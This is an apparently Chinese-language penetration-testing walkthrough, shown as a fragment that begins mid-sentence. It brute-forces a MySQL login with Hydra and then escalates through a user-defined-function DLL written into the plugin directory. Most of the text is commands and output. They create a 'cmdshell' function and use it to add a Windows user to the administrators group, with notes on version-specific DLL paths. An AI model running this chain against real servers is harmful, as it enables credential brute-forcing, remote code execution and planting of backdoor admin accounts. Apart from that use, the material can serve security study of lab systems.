0428
.action
的URLCREATE USER 'n00p'@'localhost' IDENTIFIED BY 'n00p';
GRANT ALL PRIVILEGES ON *.* TO 'n00p'@'%' IDENTIFIED BY 'n00p' WITH GRANT OPTION;
FLUSH PRIVILEGES;
root@kali:~/dock# cat user.txt
root
n00p
root@kali:~/dock# cat pass.txt
root
n00p
··· bash
root@kali:~/dock# hydra vic mysql -L user.txt -P pass.txt -V
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-27 23:23:55
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking mysql://vic:3306/
[ATTEMPT] target vic - login "root" - pass "root" - 1 of 4 [child 0] (0/0)
[ATTEMPT] target vic - login "root" - pass "n00p" - 2 of 4 [child 1] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "root" - 3 of 4 [child 2] (0/0)
[ATTEMPT] target vic - login "n00p" - pass "n00p" - 4 of 4 [child 3] (0/0)
[3306][mysql] host: vic login: n00p password: n00p
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-04-27 23:23:55
```
set @my_udf_a=concat('',dll的16进制);
mysql> use mysql;
Database changed
mysql> set @my_udf_a=concat('', 此处限于篇幅省略);
Query OK, 0 rows affected (0.00 sec)
mysql> create table my_udf_data(data LONGBLOB);
Query OK, 0 rows affected (0.08 sec)
mysql> insert into my_udf_data values("");
Query OK, 1 row affected (0.00 sec)
### 2.8 mysql> update my_udf_data set data = @my_udf_a;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0
Mysql<5.0,导出路径随意;
5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误;
mysql>5.1,需要导出dll到插件路径,插件路径可以用下面这条命令查看:show variables like '%plugin%';
mysql> select @@version;
+-----------+
| @@version |
+-----------+
| 5.5.53 |
+-----------+
1 row in set (0.01 sec)
mysql> show variables like '%plugin%';
+---------------+-------------------------------------------+
| Variable_name | Value |
+---------------+-------------------------------------------+
| plugin_dir | C:\phpStudy\PHPTutorial\MySQL\lib\plugin\ |
+---------------+-------------------------------------------+
1 row in set (0.01 sec)
这一步遇到了plugin文件夹不存在的问题,因为是测试用,所以 手动从目标机器建立plugin文件夹
mysql> select data from my_udf_data into DUMPFILE 'C:\phpStudy\PHPTutorial\MySQL\lib\plugin\n00p.dll';
1 - Can't create/write to file 'C:phpStudyPHPTutorialMySQLlibplugin
00p.dll' (Errcode: 22)
mysql> select data from my_udf_data into DUMPFILE 'C:/phpStudy/PHPTutorial/MySQL/lib/plugin/n00p.dll';
Query OK, 1 row affected (0.00 sec)
由以上代码块可知,路径中单反斜杠不起作用,需转换成单正斜杠,或者双反斜杠
mysql> create function cmdshell returns string soname 'n00p.dll';
Query OK, 0 rows affected (0.08 sec)
这里不知为何乱码,但可以确定命令被执行,等会可以验证是否执行成功
mysql> select cmdshell('net user n00p n00p /add');
+----------------------------------------------------------+
| cmdshell('net user n00p n00p /add') |
+----------------------------------------------------------+
| ����ɹ���ɡ�
--------------------------------------------���!
|
+----------------------------------------------------------+
1 row in set (0.41 sec)
mysql> select cmdshell('net localgroup administrators n00p /add');
+----------------------------------------------------------+
| cmdshell('net localgroup administrators n00p /add') |
+----------------------------------------------------------+
| ����ɹ���ɡ�
--------------------------------------------���!
|
+----------------------------------------------------------+
1 row in set (0.05 sec)
目标机切换Apache为服务方式运行,并添加低权限用户,为该用户添加日志文件读写权限
此处用的双反斜杠,同时改变html元素的width属性,使得输入框能显示完整路径